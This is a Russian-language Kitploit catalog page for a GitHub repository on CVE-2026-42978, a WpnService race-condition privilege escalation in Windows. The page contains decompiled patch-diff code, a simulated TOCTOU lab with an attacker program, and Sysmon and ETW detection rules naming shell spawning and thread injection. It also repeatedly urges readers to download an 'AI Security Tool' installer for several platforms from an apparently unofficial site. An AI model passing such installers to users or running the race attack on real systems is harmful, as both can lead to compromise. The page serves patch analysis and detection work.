Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free и Race Condition PoC-исследование, диагностический сканер и модуль аудита безопасности для AI Security Tool. | Kitploit
Инструменты/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Оборонительные ИнструментыПовышение привилегийСканеры уязвимостейАнализ уязвимостейЭксплуатацияРазведка угрозСтатьи и ИсследованияОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free и Race Condition PoC-исследование, диагностический сканер и модуль аудита безопасности для AI Security Tool.

РепозиторийСайт
1317 ч 23 мин назадЕщё не проверено
Поделиться

CVE-2026-42978
Модуль Windows Push Notifications для AI Security Tool

Экосистема безопасности нового поколения на базе ИИ, мультипротокольный терминал и набор автономных агентов


Latest Release Build Status Donations Telegram Channel License

Сайт · Документация продукта · Хост-приложение · Чат сообщества

Навигация по сайту: Главная · Обновления · Загрузки · Модули

Module banner


Официальное хост-приложение

Продукт: AI Security Tool
Сайт: zerodayevil.github.io
Документация: https://zerodayevil.github.io/ai-security-tool

Этот модуль представляет собой проверенный разбор и профиль безопасной проверки для AI Security Tool.
Используйте только модули, перечисленные на сайте проекта или в официальном каталоге. Загружайте этот модуль внутри одобренного приложения, против конечных точек, которыми вы владеете или на оценку которых у вас есть письменное разрешение.

Этот репозиторий не содержит вооружённого эксплойта против WpnService. Лаборатория в каталоге lab/ — это автономная имитация класса уязвимости (TOCTOU / двойное чтение). Она не взаимодействует с реальной службой push-уведомлений.


Быстрый старт и установка

Сначала установите хост-приложение. Затем включите этот модуль через Modules → Windows / Local EoP → CVE-2026-42978.

Готовые сборки

ОС / платформаВерсияАрхитектура / форматОбновленоСтатусЗагрузка
Windowsv6.3.20x64 installer (.exe)2026-09-08ПоследняяСкачать .exe
Windowsv6.3.20x64 portable (.tar.gz)2026-09-08ПоследняяСкачать .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05СтабильнаяСкачать .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01СтабильнаяСкачать .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01СтабильнаяСкачать .apk

Только официальные источники:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Концептуальный обзор

CVE-2026-42978 — это локальное повышение привилегий в Windows Push Notifications. Microsoft описывает это как одновременный доступ к общему ресурсу без должной синхронизации (CWE-362). Исследование пропатченной и непропатченной версий wpncore.dll показывает гонку с использованием после освобождения (use-after-free) в PresentationEndpointFacade во время завершения работы платформы.

WpnService работает в сессии 0 как NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). Доставка всплывающих уведомлений, плиток и значков проходит через неё. Выигранная гонка против этого процесса — это проблема уровня SYSTEM на локальной машине, а не удалённая уязвимость DC до аутентификации.

Статус: исправлено 10 июня 2026 (Patch Tuesday). Эта страница — оборонительное исследование.

Это не CVE-2026-41089 (Netlogon RCE). Другой компонент, другая модель привилегий, другая дата исправления.


Характеристики

ПолеЗначение
CVECVE-2026-42978
БДУBDU:2026-08249
Уведомление вендораMSRC — Windows Push Notifications EoP
КритичностьВысокая · CVSS 3.1 7.8
СлабостьCWE-362 состояние гонки · use-after-free на пути завершения работы
КомпонентWindows Push Notifications · WpnService · wpncore.dll
Вектор атакиЛокальный
Требуемые привилегииНизкие (авторизованный локальный пользователь)
Взаимодействие с пользователемОтсутствует
Patch Tuesday10 июня 2026
Тип модуляИсследовательский разбор + безопасная проверка в приложении + пакет обнаружения

Область применения

Клиентские и серверные SKU, в которых поставляется Push Notifications. Перед закрытием тикета уточните точный KB на MSRC.

СемействоПримечания
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 в зависимости от применимости)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (полные и Server Core, где компонент присутствует)

Ориентировочные сборки по публичным примечаниям к обслуживанию (всегда перепроверяйте на MSRC):

ВеткаОриентировочная исправленная сборка
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Пример wpncore.dll (24H2)уязвимая 26100.8521 → исправленная 26100.8655

Первопричина (исследование)

Фасад оборачивает вызовы API уведомлений и делегирует их в PresentationEndpointImpl. Во время завершения работы платформы объект NotificationPlatform уничтожается. Несколько методов фасада исторически получали указатель на платформу без флага завершения работы или общей блокировки. Если завершение выигрывает гонку, следующий вызов использует висячий указатель.

Facade, platform, shutdown guard

Один и тот же шаблон блокировки и защиты был применён к 49 методам PresentationEndpointFacade::*. Реализующие методы под ними остались без изменений — дыра находилась на уровне фасада.

Неисправленная форма (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

Исправленная форма (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

Что добавляет патч:

  1. AcquireSRWLockShared — блокировка чтения-записи; завершение работы берёт эксклюзивную блокировку.
  2. s_platformShutdown — выход с E_APPLICATION_EXITING, если завершение уже началось.
  3. Освобождение через RAII с помощью WIL unique_storage, поэтому блокировка снимается и на путях исключений.
  4. Флаг функции Feature_4097557817 для поэтапного развёртывания / отката.

Масштаб различий бинарника

КатегорияПримеры функций
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
TileTileCreateSession, TileCloseSession, TileRequestResourceForeground
РегистрацияRegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
НастройкиChangeAppSetting, QueryAppSetting, QueryGlobalSetting
ДоставкаDeliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
ЗапросыGetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler

Заметки по PE из reports/:

  • .text вырос на 18 432 байта
  • .data вырос на 96 байт (Wns::s_platformLock, Wns::s_platformShutdown)
  • новых импортов нет — API блокировок SRW уже присутствовали
  • новый деструктор RAII для освобождения эксклюзивной блокировки

Воздействие

WpnService работает как SYSTEM. Если гонка выиграна, вызов висячего vtable может быть превращён в локальное выполнение кода с правами SYSTEM. Этот шаг — heap spray, перехват vtable, полезная нагрузка — вне области рассмотрения здесь.

Этот модуль предназначен для понимания первопричины, проверки патча и обнаружения.


Использование этого модуля внутри AI Security Tool

  1. Установите актуальную официальную сборку с zerodayevil.github.io.
  2. Откройте Modules → CVE-2026-42978.
  3. Направьте проверку на авторизованные конечные точки Windows.
  4. Рассматривайте результат как наличие патча / состояние WPN, а не как «запуск гонки».
  5. При желании соберите пакет обнаружения (detection/) на лабораторной машине.

Не запускайте циклы сбоев или гонок против рабочей WpnService.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

Лаборатория TOCTOU (только имитация службы)

lab/ — это автономная демонстрация на C двойного чтения / TOCTOU. Она использует именованный канал и разделяемую память. Она не загружает wpncore.dll и не запускает и не останавливает WpnService.

  • vulnerable_service.exe — проверяет длину, делает паузу, снова читает длину.
  • race_attacker.exe — изменяет разделяемое значение в течение этого окна.
  • --patched — однократное чтение в локальную переменную; тот же атакующий должен увидеть ноль гонок.

Требуется GCC (MinGW). Из каталога lab/:

root@kitploit:~
build.bat

Терминал 1: vulnerable_service.exe
Терминал 2: race_attacker.exe 5
Затем сравните с vulnerable_service.exe --patched.

TOCTOU race condition demo


Обнаружение и поиск угроз

Монитор ETW — detection/etw_wpn_monitor.ps1

Семь проверок:

  1. Состояние и PID WpnService
  2. История сбоев / перезапусков
  3. Всплеск событий в журнале Push Notifications Platform
  4. Именованные каналы, связанные с WPN
  5. Признак патча (дата / сборка wpncore.dll)
  6. Процессы с загруженными модулями WPN
  7. Аудит junction / symlink в путях данных уведомлений
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

ПравилоДля чего оно нужно
WPN_EoP_ChildProcesssvchost (netsvcs) порождает cmd / powershell / wscript
WPN_PipeAccessПодключения к именованным каналам, связанным с WPN
WPN_FileCreationСоздание файлов в каталогах данных уведомлений
WPN_RegistryTamperingЗапись в ключи PushNotifications
WPN_ProcessAccessPROCESS_ALL_ACCESS к svchost
WPN_ThreadInjectionCreateRemoteThread в svchost
root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

Просмотр событий

Канал: Microsoft-Windows-PushNotifications-Platform/Operational

  • Событие 1225 — команды WPN транспортного уровня
  • Частота всплесков (например, >20/мин) — повод присмотреться, но не обвинение
  • Error / Critical — возможный сбой из-за неудачной попытки

Event Viewer WPN operational log


Контрольный список мер защиты

  • Кумулятивное обновление июня 2026 на каждом SKU в области применения
  • Сборка wpncore.dll соответствует исправленной строке для этой ветки
  • EDR / Sysmon на рабочих станциях и jump-серверах, а не только на DC
  • Оповещение при порождении оболочки процессом svchost -k netsvcs
  • Результат модуля хост-приложения заархивирован вместе с инвентаризацией исправлений

Если etw_wpn_monitor.ps1 сообщает об отсутствии патча — установите обновление июня 2026 и перепроверьте.


Связанные CVE (кластер WPN июня 2026)

CVEКласс
CVE-2026-42977EoP · гонка
CVE-2026-42978EoP · гонка (этот модуль)
CVE-2026-42979EoP · гонка
CVE-2026-42991EoP · гонка
CVE-2026-42969Раскрытие информации · гонка
CVE-2026-42970Раскрытие информации · гонка
CVE-2026-42973Раскрытие информации · гонка
CVE-2026-26167EoP
CVE-2026-32160EoP

Структура репозитория

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

Требуется: Windows 10/11 для скриптов обнаружения · MinGW для имитационной лаборатории · Sysmon опционально.

Скриншоты в этом README загружаются с публичных URL-адресов изображений. Они не хранятся в этом дереве.


Ссылки

  • MSRC — CVE-2026-42978
  • Запись CVE
  • BDU:2026-08249

Каталог модулей безопасности

Удалённое выполнение кода и сетевые проблемы 4 модуля
  • CVE-2026-41089 — Модуль Windows Netlogon · @ZeroDayEvil
  • CVE-2026-20805 — Модуль Windows RCE · @ZeroDayEvil
  • CVE-2026-41096 — Модуль проверки критического RCE · @ZeroDayEvil
  • CVE-2026-24291 — Модуль сетевого протокола · @ZeroDayVPN
Повышение привилегий и службы 2 модуля
  • CVE-2026-66804 — EoP службы CrossDevice · @ZeroDayVPN
  • CVE-2026-42978 — EoP Windows Push Notifications (этот репозиторий) · @ZeroDayEvil
Исследования и разборы 2 модуля
  • CVE-2026-50416 — Разбор локального повышения привилегий · @ZeroDayEvil
  • CVE-2026-83991 — Модуль разбора · @ZeroDayVPN

Вклад и сообщество

Полезная работа:

  1. Факты — сборки MSRC, родственные CVE в кластере WPN июня.
  2. Обнаружение — Sigma, улучшенный ETW, рекомендации по ASR.
  3. Метаданные хост-приложения и переводы.
  4. Документация и исправления неработающих ссылок.

Не открывайте PR, который добавляет вооружённый эксплойт для WpnService, вспомогательный инструмент heap spray или PoC-эксплойт против работающей службы.


Контакты и поддержка

  • Сайт: zerodayevil.github.io
  • Документация продукта: zerodayevil.github.io/ai-security-tool
  • Администратор Telegram: @ZeroDayEvil
  • Чат Telegram: @ZeroDyaTool_chat
  • Канал Telegram: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

Лицензия и правовая информация

Выпущено под лицензией MIT. См. LICENSE.

Только авторизованное оборонительное исследование и системное администрирование.
Тестирование локального повышения привилегий без письменного разрешения незаконно.

Уязвимость исправлена. Поддерживайте Windows в актуальном состоянии. Этот репозиторий не содержит вооружённого эксплойта против работающей службы.


AI Security Tool — терминальный рабочий процесс и автоматизация для специалистов по кибербезопасности.

Оборонительный модуль для zerodayevil.github.io · Без автономного эксплойта для WpnService · Проверяйте факты на MSRC

Скачать инструмент